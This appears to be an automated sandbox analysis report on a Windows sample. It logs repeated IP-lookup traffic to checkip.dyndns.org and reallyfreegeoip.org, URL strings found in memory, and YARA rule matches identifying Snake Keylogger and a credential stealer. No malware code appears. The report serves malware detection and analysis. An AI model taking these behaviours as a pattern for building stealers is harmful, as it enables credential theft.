              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
              Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
              Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
              Source: RegSvcs.exe, 00000007.00000002.2269652870.000000000347D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.0000000003498000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.000000000348B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000328A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000332B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003346000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000331D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003338000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003373000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003382000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
              Source: RegSvcs.exe, 00000007.00000002.2269652870.000000000347D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.0000000003498000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.000000000342D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.000000000348B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000328A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000332B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.00000000032CD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003354000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003346000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000327E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000331D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003338000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003373000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003382000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
              Source: RegSvcs.exe, 00000007.00000002.2269652870.0000000003321000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.00000000031C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
              Source: file.exe, 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, aVmZDnwW.exe, 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
              Source: file.exe, aVmZDnwW.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
              Source: file.exe, aVmZDnwW.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
              Source: file.exe, aVmZDnwW.exe.0.dr | String found in binary or memory: http://ocsp.comodoca.com0
              Source: RegSvcs.exe, 00000007.00000002.2269652870.000000000347D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.0000000003402000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.0000000003498000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.000000000348B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000332B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003346000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000331D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003338000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003373000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003382000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.00000000032A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
              Source: file.exe, 00000000.00000002.2185937260.0000000002D76000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.0000000003321000.00000004.00000800.00020000.00000000.sdmp, aVmZDnwW.exe, 00000008.00000002.2229755626.00000000028B9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.00000000031C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: RegSvcs.exe, 00000007.00000002.2269652870.000000000347D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.0000000003498000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.000000000342D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.000000000348B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000328A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000332B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.00000000032CD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003346000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000331D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003338000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003373000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003382000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
              Source: file.exe, 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, aVmZDnwW.exe, 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000328A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: RegSvcs.exe, 0000000C.00000002.2314110382.0000000003382000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
              Source: RegSvcs.exe, 00000007.00000002.2269652870.000000000347D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.0000000003498000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.000000000342D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.000000000348B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000332B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.00000000032CD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003346000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000331D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003338000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003373000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003382000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
              Source: file.exe, aVmZDnwW.exe.0.dr | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
              Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49777
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49798
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49790
              Source: unknown | Network traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49808 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49808
              Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknown | Network traffic detected: HTTP traffic on port 49777 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49798 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49790 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49767

              System Summary

              Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
              Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
              Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
              Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
              Source: 8.2.aVmZDnwW.exe.411c690.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
              Source: 8.2.aVmZDnwW.exe.411c690.3.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
              Source: 8.2.aVmZDnwW.exe.411c690.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
              Source: 8.2.aVmZDnwW.exe.411c690.3.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
              Source: 8.2.aVmZDnwW.exe.41c3878.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
              Source: 8.2.aVmZDnwW.exe.41c3878.5.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
              Source: 8.2.aVmZDnwW.exe.41c3878.5.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
              Source: 8.2.aVmZDnwW.exe.41c3878.5.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
              Source: 0.2.file.exe.44d29e8.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
              Source: 0.2.file.exe.44d29e8.3.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
              Source: 0.2.file.exe.44d29e8.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
              Source: 0.2.file.exe.44d29e8.3.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
              Source: 0.2.file.exe.44d29e8.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
              Source: 0.2.file.exe.44d29e8.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
              Source: 0.2.file.exe.44d29e8.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
              Source: 0.2.file.exe.44d29e8.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
              Source: 0.2.file.exe.4408da8.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
              Source: 0.2.file.exe.4408da8.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
              Source: 0.2.file.exe.4408da8.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
              Source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
              Source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
              Source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
              Source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
              Source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
              Source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
              Source: 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
              Source: 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger | Author: ditekSHen
              Source: 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
              Source: 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger | Author: ditekSHen
              Source: 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
              Source: 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger | Author: ditekSHen
              Source: Process Memory Space: file.exe PID: 3752, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
              Source: Process Memory Space: file.exe PID: 3752, type: MEMORYSTR | Matched rule: Detects Snake Keylogger | Author: ditekSHen
              Source: Process Memory Space: RegSvcs.exe PID: 7276, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
              Source: Process Memory Space: RegSvcs.exe PID: 7276, type: MEMORYSTR | Matched rule: Detects Snake Keylogger | Author: ditekSHen
              Source: Process Memory Space: aVmZDnwW.exe PID: 7328, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
              Source: Process Memory Space: aVmZDnwW.exe PID: 7328, type: MEMORYSTR | Matched rule: Detects Snake Keylogger | Author: ditekSHen
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E07F4 NtQueryInformationProcess, | 0_2_028E07F4
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E9B68 NtQueryInformationProcess, | 0_2_028E9B68
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_00E007F4 NtQueryInformationProcess, | 8_2_00E007F4
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_00E09B68 NtQueryInformationProcess, | 8_2_00E09B68
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E13D0 | 0_2_028E13D0
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E8379 | 0_2_028E8379
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028EA0B2 | 0_2_028EA0B2
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E0878 | 0_2_028E0878
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E2698 | 0_2_028E2698
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E1C60 | 0_2_028E1C60
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E35A8 | 0_2_028E35A8
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E92A5 | 0_2_028E92A5
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E92D0 | 0_2_028E92D0
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E5B90 | 0_2_028E5B90
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E5BA0 | 0_2_028E5BA0
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E5308 | 0_2_028E5308
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E1332 | 0_2_028E1332
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E5000 | 0_2_028E5000
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E2118 | 0_2_028E2118
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E5919 | 0_2_028E5919
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E5928 | 0_2_028E5928
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E56A8 | 0_2_028E56A8
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E16A7 | 0_2_028E16A7
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E56B8 | 0_2_028E56B8
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E4FF0 | 0_2_028E4FF0
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E4499 | 0_2_028E4499
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E44A8 | 0_2_028E44A8
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E34ED | 0_2_028E34ED
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E8C29 | 0_2_028E8C29
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E8C70 | 0_2_028E8C70
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_028E5DAA | 0_2_028E5DAA
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_029AA598 | 0_2_029AA598
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_029AA5A8 | 0_2_029AA5A8
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_029A85EC | 0_2_029A85EC
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0994A0F0 | 0_2_0994A0F0
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_09941CD0 | 0_2_09941CD0
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_09941CC0 | 0_2_09941CC0
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0998C390 | 0_2_0998C390
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_09985198 | 0_2_09985198
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_09984928 | 0_2_09984928
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_09986DD0 | 0_2_09986DD0
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_09986DC0 | 0_2_09986DC0
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_09984D60 | 0_2_09984D60
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_09986438 | 0_2_09986438
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_09986428 | 0_2_09986428
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0A0A9EE8 | 0_2_0A0A9EE8
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0A0A9180 | 0_2_0A0A9180
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0A0A6B17 | 0_2_0A0A6B17
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0A0A6B28 | 0_2_0A0A6B28
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0A0ADE68 | 0_2_0A0ADE68
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0A0A4DD0 | 0_2_0A0A4DD0
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0A0A4DE0 | 0_2_0A0A4DE0
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0A0A70C9 | 0_2_0A0A70C9
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0A0A70D8 | 0_2_0A0A70D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0319B328 | 7_2_0319B328
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_03196108 | 7_2_03196108
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0319C190 | 7_2_0319C190
